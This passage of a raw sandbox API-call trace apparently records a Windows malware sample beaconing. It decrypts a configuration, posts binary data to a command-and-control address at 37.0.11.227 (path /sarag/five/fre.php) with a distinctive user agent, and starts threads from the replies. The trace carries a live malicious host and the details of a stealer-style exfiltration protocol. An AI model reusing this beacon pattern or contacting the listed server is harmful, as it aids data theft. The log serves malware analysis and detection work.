CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.082] GetProcessHeap () returned 0x690000 [0249.083] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0249.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.084] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0249.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.085] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0249.089] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.089] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0249.089] GetProcessHeap () returned 0x690000 [0249.089] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0249.090] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.091] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0249.091] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.092] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0249.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.093] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0249.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.094] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0249.094] GetProcessHeap () returned 0x690000 [0249.094] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0249.094] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0249.094] GetProcessHeap () returned 0x690000 [0249.094] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0249.094] socket (af=2, type=1, protocol=6) returned 0x6ec [0249.095] connect (s=0x6ec, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0249.123] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0249.123] GetProcessHeap () returned 0x690000 [0249.123] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0249.123] GetProcessHeap () returned 0x690000 [0249.123] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0249.124] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0249.125] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0249.125] GetProcessHeap () returned 0x690000 [0249.125] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0249.125] GetProcessHeap () returned 0x690000 [0249.125] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0249.126] GetProcessHeap () returned 0x690000 [0249.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0249.126] GetProcessHeap () returned 0x690000 [0249.126] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0249.126] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0249.127] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0249.127] GetProcessHeap () returned 0x690000 [0249.127] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0249.127] GetProcessHeap () returned 0x690000 [0249.128] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0249.128] send (s=0x6ec, buf=0x6ad508*, len=242, flags=0) returned 242 [0249.128] send (s=0x6ec, buf=0x6aba40*, len=159, flags=0) returned 159 [0249.129] GetProcessHeap () returned 0x690000 [0249.129] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0249.129] recv (in: s=0x6ec, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0249.222] GetProcessHeap () returned 0x690000 [0249.222] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0249.223] GetProcessHeap () returned 0x690000 [0249.223] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0249.223] GetProcessHeap () returned 0x690000 [0249.223] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0249.223] GetProcessHeap () returned 0x690000 [0249.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0249.224] closesocket (s=0x6ec) returned 0 [0249.224] GetProcessHeap () returned 0x690000 [0249.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0249.224] GetProcessHeap () returned 0x690000 [0249.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0249.224] GetProcessHeap () returned 0x690000 [0249.225] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0249.225] GetProcessHeap () returned 0x690000 [0249.225] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0249.225] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1444) returned 0x6ec [0249.227] Sleep (dwMilliseconds=0xea60) [0249.228] GetProcessHeap () returned 0x690000 [0249.228] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0249.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.229] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0249.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.234] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0249.239] GetProcessHeap () returned 0x690000 [0249.239] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0249.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.240] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0249.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.241] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0249.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.242] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.242] GetProcessHeap () returned 0x690000 [0249.243] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0249.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.272] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0249.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.284] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0249.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.285] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0249.285] GetProcessHeap () returned 0x690000 [0249.285] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0249.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.286] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0249.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.287] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0249.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.288] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0249.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.289] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0249.289] GetProcessHeap () returned 0x690000 [0249.289] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0249.289] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0249.289] GetProcessHeap () returned 0x690000 [0249.290] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0249.290] GetProcessHeap () returned 0x690000 [0249.290] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0249.290] GetProcessHeap () returned 0x690000 [0249.290] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0249.290] GetProcessHeap () returned 0x690000 [0249.290] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0249.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.291] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0249.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.299] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0249.304] GetProcessHeap () returned 0x690000 [0249.304] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0249.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.305] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0249.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.306] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0249.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.307] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.307] GetProcessHeap () returned 0x690000 [0249.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0249.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.308] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0249.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.309] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0249.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0249.310] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0249.310] GetProcessHeap () returned 0x690000 [0249.310] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0249.310] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.311] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0249.311] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.312] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0249.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.313] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0249.313] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0249.313] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0249.313] GetProcessHeap () returned 0x690000 [0249.313] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0249.313] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0249.314] GetProcessHeap () returned 0x690000 [0249.314] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0249.314] socket (af=2, type=1, protocol=6) returned 0x6f0 [0249.314] connect (s=0x6f0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0250.560] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0250.575] GetProcessHeap () returned 0x690000 [0250.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0250.575] GetProcessHeap () returned 0x690000 [0250.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0250.576] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0250.577] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0250.577] GetProcessHeap () returned 0x690000 [0250.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0250.577] GetProcessHeap () returned 0x690000 [0250.577] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0250.577] GetProcessHeap () returned 0x690000 [0250.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0250.577] GetProcessHeap () returned 0x690000 [0250.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0250.578] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0250.581] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0250.581] GetProcessHeap () returned 0x690000 [0250.581] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0250.581] GetProcessHeap () returned 0x690000 [0250.582] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0250.582] send (s=0x6f0, buf=0x6ad508*, len=242, flags=0) returned 242 [0250.582] send (s=0x6f0, buf=0x6aba40*, len=159, flags=0) returned 159 [0250.582] GetProcessHeap () returned 0x690000 [0250.582] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0250.582] recv (in: s=0x6f0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0250.690] GetProcessHeap () returned 0x690000 [0250.690] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0250.690] GetProcessHeap () returned 0x690000 [0250.690] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0250.690] GetProcessHeap () returned 0x690000 [0250.691] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0250.691] GetProcessHeap () returned 0x690000 [0250.691] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0250.691] closesocket (s=0x6f0) returned 0 [0250.692] GetProcessHeap () returned 0x690000 [0250.692] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0250.692] GetProcessHeap () returned 0x690000 [0250.692] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0250.692] GetProcessHeap () returned 0x690000 [0250.693] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0250.693] GetProcessHeap () returned 0x690000 [0250.693] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0250.706] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1448) returned 0x6f0 [0250.707] Sleep (dwMilliseconds=0xea60) [0250.710] GetProcessHeap () returned 0x690000 [0250.710] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0250.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.711] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0250.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.721] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0250.732] GetProcessHeap () returned 0x690000 [0250.732] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0250.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.733] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0250.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.734] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0250.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.742] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.742] GetProcessHeap () returned 0x690000 [0250.743] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0250.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.744] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0250.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.745] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0250.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.746] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0250.746] GetProcessHeap () returned 0x690000 [0250.746] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0250.747] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.747] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0250.748] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.748] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0250.749] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.749] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0250.750] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.750] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0250.750] GetProcessHeap () returned 0x690000 [0250.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0250.750] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0250.751] GetProcessHeap () returned 0x690000 [0250.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0250.751] GetProcessHeap () returned 0x690000 [0250.752] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0250.752] GetProcessHeap () returned 0x690000 [0250.752] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0250.753] GetProcessHeap () returned 0x690000 [0250.753] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0250.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.754] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0250.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.762] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0250.768] GetProcessHeap () returned 0x690000 [0250.768] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0250.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.769] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0250.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.770] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0250.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.774] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.774] GetProcessHeap () returned 0x690000 [0250.774] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0250.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.775] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0250.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.776] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0250.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0250.777] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0250.777] GetProcessHeap () returned 0x690000 [0250.778] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0250.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.779] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0250.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0250.780] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0250.781] 